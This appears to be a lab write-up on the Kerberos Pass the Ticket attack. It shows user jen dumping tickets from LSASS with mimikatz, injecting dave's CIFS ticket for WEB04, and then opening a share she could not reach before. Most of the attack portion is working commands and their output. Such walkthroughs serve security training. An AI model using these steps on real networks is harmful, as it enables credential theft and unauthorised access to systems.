Pass The Ticket

Recap

Kerberos uses a Ticket Granting Service (TGS) authentication method. The Pass the Ticket attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network and then used to authenticate to a specific service.

In this scenario we abuse the already existing session ticket of the user "dave" that exists on the network. We will fetch the ticket with mimikatz and inject the ticket into our current user: "Jen" to access files that are under daves permission.

Attack

To demonstrate the attack angle, we are going to extract all the current TGT/TGS in memory and inject dave's WEB04 TGS into our own session. This will allow us to access the restricted folder.

Verify Jen does not have Access

We can verify that Jen does not have access to the following folder:

PS C:\Windows\system32> whoami
corp\jen
PS C:\Windows\system32> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.
At line:1 char:1
+ ls \\web04\backup
+ ~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (\\web04\backup:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

Launch Mimikatz

This command parses the LSASS process space in memory for any TGT/TGS, which is then saved to disk in the kirbi mimikatz format.

mimikatz #privilege::debug
Privilege '20' OK

mimikatz #sekurlsa::tickets /export

Authentication Id : 0 ; 2037286 (00000000:001f1626)
Session           : Batch from 0
User Name         : dave
Domain            : CORP
Logon Server      : DC1
Logon Time        : 9/14/2022 6:24:17 AM
SID               : S-1-5-21-1987370270-658905905-1781884369-1103

         * Username : dave
         * Domain   : CORP.COM
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 9/14/2022 6:24:17 AM ; 9/14/2022 4:24:17 PM ; 9/21/2022 6:24:17 AM
           Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
           Target Name  (02) : krbtgt ; CORP ; @ CORP.COM
           Client Name  (01) : dave ; @ CORP.COM ( CORP )
           Flags 40c10000    : name_canonicalize ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             f0259e075fa30e8476836936647cdabc719fe245ba29d4b60528f04196745fe6
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1f1626][email protected] !
...

Verify Generated Tickets

We can verify the newly generated tickes by filters out files with the *.kirbi extension

PS C:\Tools> dir *.kirbi


    Directory: C:\Tools


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;12bd0][email protected]
-a----        9/14/2022   6:24 AM           1561 [0;1c6860][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;1c6860][email protected]
-a----        9/14/2022   6:24 AM           1561 [0;1c7bcc][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;1c7bcc][email protected]
-a----        9/14/2022   6:24 AM           1561 [0;1c933d][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;1c933d][email protected]
-a----        9/14/2022   6:24 AM           1561 [0;1ca6c2][email protected]
-a----        9/14/2022   6:24 AM           1505 [0;1ca6c2][email protected]
...

Selecting TGS Ticket

Many tickets have been created, we can select any and inject it through mimikatz

mimikatz # kerberos::ptt [0;12bd0][email protected]

* File: '[0;12bd0][email protected]': OK

Verifying Ticket Injection in Session

Let's verify that we've injected the ticket by entering "klist"

PS C:\Tools> klist

Current LogonId is 0:0x13bca7

Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

Confirming Success

Let's confirm that we've successfully completed the attack by trying to access the folder we initially didn't have permissions for:

PS C:\Tools> ls \\web04\backup


    Directory: \\web04\backup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt

Last updated